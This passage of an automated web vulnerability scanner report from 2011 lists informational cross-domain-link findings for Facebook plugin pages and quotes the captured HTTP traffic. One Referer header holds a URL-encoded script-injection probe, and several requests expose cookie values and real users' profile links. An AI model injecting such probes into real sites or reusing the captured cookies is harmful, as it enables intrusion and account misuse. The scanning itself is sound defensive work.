Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"14441-1307726118848"
Last-Modified: Fri, 10 Jun 2011 17:15:18 GMT
Content-Type: text/javascript
Cteonnt-Length: 14441
Content-Length: 14441
Vary: Accept-Encoding
Cache-Control: private, max-age=71169
Date: Mon, 13 Jun 2011 11:26:58 GMT
Connection: close

//configuration --- can be put into separate file
//first flag indicates clear seoid
//second flag - null indicates check for SEMCID, true is to clear the cookie, false is don't clear the cookie
v
...[SNIP]...
/ footer
       var footerDiv = document.getElementById('footer');
       var dynamicFooterDiv = document.createElement("div");
       dynamicFooterDiv.id = "msnnzFooterSuffix";
       dynamicFooterDiv.innerHTML = '<iframe scrolling=no frameborder=no style="height:65px; width:992px; border:none; overflow:hidden;" border="0" src="http://serviceslb-198436258.us-east-1.elb.amazonaws.com/Header/v1?pt=cobrand&partnerid=40654&pos=29&type=footer"></iframe>
...[SNIP]...

18.214. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=2a6467d28941d69750c4f7ad49d2ebae&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F0%2F7%2F4%2F198470%2Fcuts%2Fmc-dallastexas02-web_72x72.jpg
http://external.ak.fbcdn.net/safe_image.php?d=301102cc30e02a7b990de235cc649a9e&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F7%2F2%2F1%2F198127%2Fcuts%2Fsitting-hand-on-head_72x72.jpg
http://external.ak.fbcdn.net/safe_image.php?d=8a4bb03f65de0309ac8ea256f0cd6c8b&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F3%2F7%2F6%2F198673%2Fcuts%2Fbatwing-cvr1_72x72.jpg
http://external.ak.fbcdn.net/safe_image.php?d=a524f60b34674c93df801e7a07851813&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F8%2F9%2F6%2F198698%2Fcuts%2Fray_72x72.jpg
http://external.ak.fbcdn.net/safe_image.php?d=cb7b075ca222b6890d0d629f93ba23dc&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F5%2F7%2F6%2F198675%2Fcuts%2Fseven-of-nine_72x72.jpg
http://external.ak.fbcdn.net/safe_image.php?d=d7249f9ff0368746a0464a20d39b177f&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F5%2F4%2F0%2F197045%2Fcuts%2Fclockwork-3_72x72.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://www.ugo.com/dvd/greatest-movie-ever-a-clockwork-orange
http://www.ugo.com/music/sully-erna-interview
http://www.ugo.com/music/tommy-lee-goes-upside-down
http://www.ugo.com/the-goods/huge-dc-reboot-gives-us-the-first-black-batman
http://www.ugo.com/tv/sons-of-anarchy-ray-mckinnon
http://www.ugo.com/tv/warehouse-13-kate-mulgrew-jeri-ryan

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.37
X-Cnection: close
Date: Mon, 13 Jun 2011 11:23:30 GMT
Content-Length: 13003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5da10ad928da1ca5"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.ugo.com/music/tommy-lee-goes-upside-down" title="Tommy Lee Does A 360" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=2a6467d28941d69750c4f7ad49d2ebae&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F0%2F7%2F4%2F198470%2Fcuts%2Fmc-dallastexas02-web_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/music/tommy-lee-goes-upside-down" target="_top">Tommy Lee Does A 360</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_26040656a51d132d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.ugo.com/the-goods/huge-dc-reboot-gives-us-the-first-black-batman" title="Huge DC Reboot Gives us the First Black Batman" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=8a4bb03f65de0309ac8ea256f0cd6c8b&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F3%2F7%2F6%2F198673%2Fcuts%2Fbatwing-cvr1_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/the-goods/huge-dc-reboot-gives-us-the-first-black-batman" target="_top">Huge DC Reboot Gives us the First Black Batman</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_ad8d5897d7b2934"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.ugo.com/dvd/greatest-movie-ever-a-clockwork-orange" title="Greatest Movie Ever: A Clockwork Orange" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=d7249f9ff0368746a0464a20d39b177f&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F5%2F4%2F0%2F197045%2Fcuts%2Fclockwork-3_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/dvd/greatest-movie-ever-a-clockwork-orange" target="_top">Greatest Movie Ever: A Clockwork Orange</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_57118cc9d8b1c929"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.ugo.com/tv/warehouse-13-kate-mulgrew-jeri-ryan" title="Warehouse 13 Casts Kate Mulgrew and Jeri Ryan" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=cb7b075ca222b6890d0d629f93ba23dc&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F5%2F7%2F6%2F198675%2Fcuts%2Fseven-of-nine_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/tv/warehouse-13-kate-mulgrew-jeri-ryan" target="_top">Warehouse 13 Casts Kate Mulgrew and Jeri Ryan</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1a64fb3cfded41a1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.ugo.com/music/sully-erna-interview" title="Sully Erna Interview" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=301102cc30e02a7b990de235cc649a9e&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F7%2F2%2F1%2F198127%2Fcuts%2Fsitting-hand-on-head_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/music/sully-erna-interview" target="_top">Sully Erna Interview</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_23c279710f77df92"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.ugo.com/tv/sons-of-anarchy-ray-mckinnon" title="Ray McKinnon Joins Sons of Anarchy" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=a524f60b34674c93df801e7a07851813&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F8%2F9%2F6%2F198698%2Fcuts%2Fray_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/tv/sons-of-anarchy-ray-mckinnon" target="_top">Ray McKinnon Joins Sons of Anarchy</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

18.215. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/186702_100001208464095_1308064_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187129_1229379364_5264970_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203090_1195532183_1836645_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/dYwII2uSVbM.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/4zEIrWluYBR.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.216. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFanSided%2F108254959223467&layout=button_count&show_faces=false&width=84&action=like&colorscheme=light&height=21

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/Ou0QNrclV2b.js
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/SqDoi07-B2a.css
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/eptfJSfAjrr.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

18.217. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=10150135798400694&width=300&connections=20&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174390_1285609837_6563305_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174535_536112368_7299567_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187085_1323242312_2248005_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203156_100001287394356_7028842_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203398_597032566_122157_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211389_706387512_5005606_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211397_100002491958962_133488_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211678_100000980712336_7850576_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/261043_763593833_6054546_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27521_10150135798400694_9161_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41497_619716046_2751_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

GET /plugins/likebox.php?id=10150135798400694&width=300&connections=20&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

18.218. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35fc238%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161745_100000201955901_835406_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174825_235165748331_5997043_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186235_500212185_4636006_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186263_1357160939_5222982_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186309_100002298848941_1884031_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186634_1602641763_5849665_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187164_679984335_2736741_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000537581244_4959703_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187590_1418863419_7103130_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195242_100001128097295_1750164_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195562_100001281917469_2391413_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202911_100002233598629_1215162_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203172_100002225007026_4006895_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211295_100001826941609_5954597_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211329_550120418_6748998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211455_1101949757_7390314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211502_100001334266387_3149516_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211963_1111905101_3802047_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23224_100000895298739_4226_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260812_100001942484028_8072593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41381_100001294358166_9686_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41499_100001419843403_6931_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_100000434735781_9787_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48979_1513838702_5168_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/70687_100000688321355_7190029_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

GET /plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35fc238%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.6.61
X-Cnection: close
Date: Mon, 13 Jun 2011 11:23:35 GMT
Content-Length: 17553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/tvfanatic" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174825_235165748331_5997043_q.jpg" alt="TV Fanatic" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/elvira.quino2" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211502_100001334266387_3149516_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1101949757" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211455_1101949757_7390314_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/SexyCindy69" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70687_100000688321355_7190029_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/CherriVonTease" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23224_100000895298739_4226_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186263_1357160939_5222982_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002233598629" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202911_100002233598629_1215162_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002298848941" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186309_100002298848941_1884031_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/brooke.mckeen21" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211329_550120418_6748998_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002225007026" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203172_100002225007026_4006895_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187164_679984335_2736741_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000201955901" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161745_100000201955901_835406_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001419843403" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41499_100001419843403_6931_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001281917469" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195562_100001281917469_2391413_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1418863419" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187590_1418863419_7103130_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1602641763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186634_1602641763_5849665_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186235_500212185_4636006_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211963_1111905101_3802047_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001942484028" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260812_100001942484028_8072593_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001128097295" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195242_100001128097295_1750164_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1513838702" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48979_1513838702_5168_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001294358166" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41381_100001294358166_9686_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000537581244" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000537581244_4959703_q.jpg" alt="" /><div class="name">
...[SNIP]...
